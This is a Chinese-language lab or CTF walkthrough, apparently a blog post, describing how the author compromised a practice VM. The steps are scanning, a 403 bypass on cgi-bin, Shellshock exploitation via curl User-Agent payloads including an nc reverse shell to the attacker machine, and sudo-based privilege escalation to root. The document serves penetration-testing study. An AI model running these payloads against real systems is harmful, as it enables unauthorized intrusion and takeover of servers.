本文讲述了作者通过端口扫描、爆破尝试、发现CGI漏洞,逐步进行403绕过,利用shellshock漏洞控制服务器,并最终获取root权限的过程。涉及的技术包括CGI文件处理、HTTP参数注入、shell命令执行和权限提升策略。
1.常规端口服务扫描发现
2.利用得到的邮箱和电话号码爆破都失败,查看源码
3.注释里面有一个cgi-bin可以使用外部应用程序,此时通擦汗那个会存在一个cgi-bin的文件夹
发现目录为403,进行403绕过,
4.查看所有的后缀名为cgi,sh的文件,使用破壳漏洞尝试控制系统
dirsearch -u http://10.0.2.36/cgi-bin/ -f -e cgi,sh
发现带有这些后缀名的文件返回状态码500
5.使用nmap进行破壳漏洞进行扫描
nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/shell.sh,cmd=ls 10.0.2.16
nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/backup.cgi,cmd=ls 10.0.2.16
发现均存在破壳漏洞
6.使用curl工具进行参数的注入
curl -H “user-agent: () { :; }, echo; echo; /bin/bash -c ‘which nc’” \http://10.0.2.16/cgi-bin/shell.sh
curl -H “user-agent: () { :; }, echo; echo; /bin/bash -c ‘nc -e /bin/bash 10.0.2.15 4444’” \http://10.0.2.16/cgi-bin/shell.sh
本机开启侦听端口,发现连接成功突破外围拿下shell
7.开始进行提权
首先进行shell的升级 python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
sudo -l 发现thor目录下有一个可以执行的shell脚本
执行脚本 sudo -u thor /home/thor/./hammer.sh
发现第二个问题时可以执行输入的系统指令 输入bash得到thor的shell
继续进行升级,sudo -l检查权限
发现存在两个文件可以使用root权限运行
sudo cat /etc/shadow 发现可以查看密码文件,但是需要考虑到可能破解需要很多的时间
另外一个service文件执行sudo service …/…/bin/sh
8.发现执行成功拿到root权限,打靶完成
扫一扫
263
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
